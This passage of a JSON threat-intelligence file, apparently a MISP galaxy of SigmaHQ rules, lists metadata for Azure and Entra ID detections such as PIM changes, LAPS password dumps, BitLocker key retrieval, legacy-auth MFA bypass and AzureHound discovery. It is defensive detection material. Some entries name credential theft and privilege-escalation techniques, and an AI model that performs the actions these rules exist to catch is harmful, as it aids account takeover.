"8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cbb67ecc-fb70-4467-9350-c910bdf7c628", "value": "Added Credentials to Existing Application" }, { "description": "Detects when changes are made to PIM roles", "meta": { "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", 
"creation_date": "2022-08-09", "falsepositive": [ "Legit administrative PIM setting configuration changes" ], "filename": "azure_pim_change_settings.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_pim_change_settings.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db6c06c4-bf3b-421c-aa88-15672b88c743", "value": "Changes To PIM Settings" }, { "description": "Detects when a configuration change is made to an application's URI.\nURIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are not unique to that app, or URIs that point to domains you do not control should be investigated.\n", "meta": { "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", "creation_date": "2022-06-02", "falsepositive": [ "When an administrator is making legitimate URI configuration changes to an application. This should be a planned event." 
], "filename": "azure_app_uri_modifications.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-configuration-changes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_uri_modifications.yml" ], "tags": [ "attack.t1528", "attack.t1078.004", "attack.persistence", "attack.credential-access", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0055ad1f-be85-4798-83cf-a6da17c993b3", "value": "Application URI Configuration Changes" }, { "description": "Monitor and alert on group membership additions of groups that have CA policy modification access", "meta": { "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", "creation_date": "2022-08-04", "falsepositive": [ "User removed from the group is approved" ], "filename": "azure_group_user_addition_ca_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_group_user_addition_ca_modification.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1548", "attack.t1556" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "91c95675-1f27-46d0-bead-d1ae96b97cd3", "value": "User Added To Group With CA Policy Modification Access" }, { "description": "Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.", "meta": { "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", "creation_date": "2022-06-02", "falsepositive": [ "When a new application owner is added by an administrator" ], "filename": "azure_app_owner_added.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#new-owner", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_owner_added.yml" ], "tags": [ "attack.t1552", "attack.credential-access" ] }, "related": [ { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "74298991-9fc4-460e-a92e-511aa60baec1", "value": "Added Owner To Application" }, { "description": "Detects changes and updates to the user risk and MFA registration policy.\nAttackers can modify these policies to bypass MFA, weaken security thresholds, facilitate further attacks, and maintain persistence.\n", "meta": { "author": "Harjot Singh (@cyb3rjy0t)", "creation_date": "2024-08-13", "falsepositive": [ "Known updates by administrators." 
], "filename": "azure_update_risk_and_mfa_registration_policy.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities", "https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-mfa-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_update_risk_and_mfa_registration_policy.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "d4c7758e-9417-4f2e-9109-6125d66dabef", "value": "User Risk and MFA Registration Policy Updated" }, { "description": "Detects newly added root certificate authority to an AzureAD tenant to support certificate based authentication.", "meta": { "author": "Harjot Shah Singh, '@cyb3rjy0t'", "creation_date": "2024-03-26", "falsepositive": [ "Unknown" ], "filename": "azure_ad_new_root_ca_added.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f", "https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_new_root_ca_added.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1556" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4bb80281-3756-4ec8-a88e-523c5a6fda9e", "value": "New Root Certificate Authority Added" }, { "description": "Detects when an account dumps the LAPS password from Entra ID.", "meta": { "author": "andrewdanis", "creation_date": "2024-06-26", "falsepositive": [ "Approved activity performed by an Administrator." 
], "filename": "azure_auditlogs_laps_credential_dumping.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://techcommunity.microsoft.com/t5/microsoft-entra-blog/introducing-windows-local-administrator-password-solution-with/ba-p/1942487", "https://twitter.com/NathanMcNulty/status/1785051227568632263", "https://www.cloudcoffee.ch/microsoft-365/configure-windows-laps-in-microsoft-intune/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_auditlogs_laps_credential_dumping.yml" ], "tags": [ "attack.t1098.005" ] }, "related": [ { "dest-uuid": "7decb26c-715c-40cf-b7e0-026f7d7cc215", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a4b25073-8947-489c-a8dd-93b41c23f26d", "value": "Windows LAPS Credential Dump From Entra ID" }, { "description": "Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.", "meta": { "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", "creation_date": "2022-07-19", "falsepositive": [ "When the permission is legitimately needed for the app" ], "filename": "azure_app_role_added.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#service-principal-assigned-to-a-role", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_role_added.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1098.003" ] }, "related": [ { "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b04934b2-0a68-4845-8a19-bdfed3a68a7a", "value": "App Role Added" }, { "description": "Detects when highly privileged 
delegated permissions are granted on behalf of all users", "meta": { "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", "creation_date": "2022-07-28", "falsepositive": [ "When the permission is legitimately needed for the app" ], "filename": "azure_app_delegated_permissions_all_users.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_delegated_permissions_all_users.yml" ], "tags": [ "attack.credential-access", "attack.t1528" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a6355fbe-f36f-45d8-8efc-ab42465cbc52", "value": "Delegated Permissions Granted For All Users" }, { "description": "Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.", "meta": { "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", "creation_date": "2022-08-09", "falsepositive": [ "Actual admin using PIM." 
], "filename": "azure_pim_activation_approve_deny.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_pim_activation_approve_deny.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "039a7469-0296-4450-84c0-f6966b16dc6d", "value": "PIM Approvals And Deny Elevation" }, { "description": "Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions", "meta": { "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", "creation_date": "2022-07-28", "falsepositive": [ "When the permission is legitimately needed for the app" ], "filename": "azure_app_privileged_permissions.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_privileged_permissions.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1098.003" ] }, "related": [ { "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5aecf3d5-f8a0-48e7-99be-3a759df7358f", "value": "App Granted Privileged Delegated Or App Permissions" }, { "description": "Detects the change of user type from \"Guest\" to \"Member\" for potential elevation of privilege.", "meta": { 
"author": "MikeDuddington, '@dudders1'", "creation_date": "2022-06-30", "falsepositive": [ "If this was approved by System Administrator." ], "filename": "azure_guest_to_member.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_guest_to_member.yml" ], "tags": [ "attack.privilege-escalation", "attack.initial-access", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8dee7a0d-43fd-4b3c-8cd1-605e189d195e", "value": "User State Changed From Guest To Member" }, { "description": "Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare \"old\" vs \"new\" value.", "meta": { "author": "Corissa Koopmans, '@corissalea'", "creation_date": "2022-07-19", "falsepositive": [ "Misconfigured role permissions", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." 
], "filename": "azure_aad_secops_ca_policy_updatedby_bad_actor.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_updatedby_bad_actor.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1548", "attack.t1556" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "50a3c7aa-ec29-44a4-92c1-fce229eef6fc", "value": "CA Policy Updated by Non Approved Actor" }, { "description": "Detects when PIM alerts are set to disabled.", "meta": { "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", "creation_date": "2022-08-09", "falsepositive": [ "Administrator disabling PIM alerts as an active choice." 
], "filename": "azure_pim_alerts_disabled.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_pim_alerts_disabled.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aeaef14c-e5bf-4690-a9c8-835caad458bd", "value": "PIM Alert Setting Changes To Disabled" }, { "description": "Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.", "meta": { "author": "AlertIQ", "creation_date": "2021-10-10", "falsepositive": [ "Unknown" ], "filename": "azure_change_to_authentication_method.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_change_to_authentication_method.yml" ], "tags": [ "attack.credential-access", "attack.t1556", "attack.persistence", "attack.defense-evasion", "attack.t1098" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4d78a000-ab52-4564-88a5-7ab5242b20c7", "value": "Change to Authentication Method" }, { "description": "Detects when a user has been elevated to manage all 
Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-26", "falsepositive": [ "If this was approved by System Administrator." ], "filename": "azure_subscription_permissions_elevation_via_auditlogs.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#assignment-and-elevation", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_subscription_permissions_elevation_via_auditlogs.yml" ], "tags": [ "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ca9bf243-465e-494a-9e54-bf9fc239057d", "value": "Azure Subscription Permission Elevation Via AuditLogs" }, { "description": "Monitor and alert on conditional access changes where non approved actor removed CA Policy.", "meta": { "author": "Corissa Koopmans, '@corissalea'", "creation_date": "2022-07-19", "falsepositive": [ "Misconfigured role permissions", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." 
], "filename": "azure_aad_secops_ca_policy_removedby_bad_actor.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_removedby_bad_actor.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1548", "attack.t1556" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "26e7c5e2-6545-481e-b7e6-050143459635", "value": "CA Policy Removed by Non Approved Actor" }, { "description": "Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD", "meta": { "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", "creation_date": "2022-07-10", "falsepositive": [ "When the permission is legitimately needed for the app" ], "filename": "azure_app_permissions_msft.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_permissions_msft.yml" ], "tags": [ "attack.credential-access", "attack.t1528" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c1d147ae-a951-48e5-8b41-dcd0170c7213", "value": "App Granted Microsoft 
Permissions" }, { "description": "Detects when a configuration change is made to an application's AppID URI.", "meta": { "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", "creation_date": "2022-06-02", "falsepositive": [ "When an administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event." ], "filename": "azure_app_appid_uri_changes.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#appid-uri-added-modified-or-removed", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_appid_uri_changes.yml" ], "tags": [ "attack.persistence", "attack.credential-access", "attack.privilege-escalation", "attack.t1552", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1b45b0d1-773f-4f23-aedc-814b759563b1", "value": "Application AppID Uri Configuration Changes" }, { "description": "Detects when end user consent is blocked due to risk-based consent.", "meta": { "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", "creation_date": "2022-07-10", "falsepositive": [ "Unknown" ], "filename": "azure_app_end_user_consent_blocked.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-stopped-due-to-risk-based-consent", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_end_user_consent_blocked.yml" ], "tags": [ 
"attack.credential-access", "attack.t1528" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7091372f-623c-4293-bc37-20c32b3492be", "value": "End User Consent Blocked" }, { "description": "Detects when an account was created and deleted in a short period of time.", "meta": { "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", "creation_date": "2022-08-11", "falsepositive": [ "Legit administrative action" ], "filename": "azure_ad_account_created_deleted.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#short-lived-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_account_created_deleted.yml" ], "tags": [ "attack.defense-evasion", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6f583da0-3a90-4566-a4ed-83c09fe18bbf", "value": "Account Created And Deleted Within A Close Time Frame" }, { "description": "Monitor and alert for Bitlocker key retrieval.", "meta": { "author": "Michael Epping, '@mepples21'", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "azure_ad_bitlocker_key_retrieval.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#bitlocker-key-retrieval", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_bitlocker_key_retrieval.yml" ], "tags": [ "attack.defense-evasion", "attack.t1078.004" ] }, "related": [ { "dest-uuid": 
"f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a0413867-daf3-43dd-9245-734b3a787942", "value": "Bitlocker Key Retrieval" }, { "description": "Detects when certificate based authentication has been enabled in an Azure Active Directory tenant.", "meta": { "author": "Harjot Shah Singh, '@cyb3rjy0t'", "creation_date": "2024-03-26", "falsepositive": [ "Unknown" ], "filename": "azure_ad_certificate_based_authencation_enabled.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f", "https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_certificate_based_authencation_enabled.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1556" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c2496b41-16a9-4016-a776-b23f8910dc58", "value": "Certificate-Based Authentication Enabled" }, { "description": "Detects when a user is removed from a privileged role. 
Bulk changes should be investigated.", "meta": { "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", "creation_date": "2022-08-05", "falsepositive": [ "Legitimate administrator actions of removing members from a role" ], "filename": "azure_priviledged_role_assignment_bulk_change.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_bulk_change.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "102e11e3-2db5-4c9e-bc26-357d42585d21", "value": "Bulk Deletion Changes To Privileged Account Permissions" }, { "description": "Detects successful authentication from potential clients using legacy authentication via user agent strings. 
This could be a sign of MFA bypass using a password spray attack.", "meta": { "author": "Harjot Singh, '@cyb3rjy0t'", "creation_date": "2023-03-20", "falsepositive": [ "Known Legacy Accounts" ], "filename": "azure_ad_suspicious_signin_bypassing_mfa.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://web.archive.org/web/20230217071802/https://blooteem.com/march-2022", "https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_suspicious_signin_bypassing_mfa.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1078.004", "attack.t1110" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53bb4f7f-48a8-4475-ac30-5a82ddfdf6fc", "value": "Potential MFA Bypass Using Legacy Client Authentication" }, { "description": "Detect when users are authenticating without MFA being required.", "meta": { "author": "MikeDuddington, '@dudders1'", "creation_date": "2022-07-27", "falsepositive": [ "If this was approved by System Administrator." 
], "filename": "azure_ad_only_single_factor_auth_required.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_only_single_factor_auth_required.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1078.004", "attack.t1556.006" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b4409cd8-0da9-46e1-a401-a241afd4d1cc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "28eea407-28d7-4e42-b0be-575d5ba60b2c", "value": "Azure AD Only Single Factor Authentication Required" }, { "description": "Detect successful authentications from countries you do not operate out of.", "meta": { "author": "MikeDuddington, '@dudders1'", "creation_date": "2022-07-28", "falsepositive": [ "If this was approved by System Administrator." 
], "filename": "azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1078.004", "attack.t1110" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8c944ecb-6970-4541-8496-be554b8e2846", "value": "Successful Authentications From Countries You Do Not Operate Out Of" }, { "description": "Detects when successful sign-ins increased by 10% or greater.", "meta": { "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", "creation_date": "2022-08-11", "falsepositive": [ "Increase of users in the environment" ], "filename": "azure_ad_auth_sucess_increase.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_auth_sucess_increase.yml" ], "tags": [ "attack.defense-evasion", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae", "value": "Measurable Increase Of Successful 
Authentications" }, { "description": "Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.", "meta": { "author": "Janantha Marasinghe", "creation_date": "2022-11-27", "falsepositive": [ "Unknown" ], "filename": "azure_ad_azurehound_discovery.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://github.com/BloodHoundAD/AzureHound", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_azurehound_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1087.004", "attack.t1526" ] }, "related": [ { "dest-uuid": "8f104855-e5b7-4077-b1f5-bc3103b41abe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e24fcba8-2557-4442-a139-1ee2f2e784db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "35b781cc-1a08-4a5a-80af-42fd7c315c6b", "value": "Discovery Using AzureHound" }, { "description": "Monitor and alert for sign-ins where the device was non-compliant.", "meta": { "author": "Michael Epping, '@mepples21'", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "azure_ad_sign_ins_from_noncompliant_devices.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_noncompliant_devices.yml" ], "tags": [ "attack.defense-evasion", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
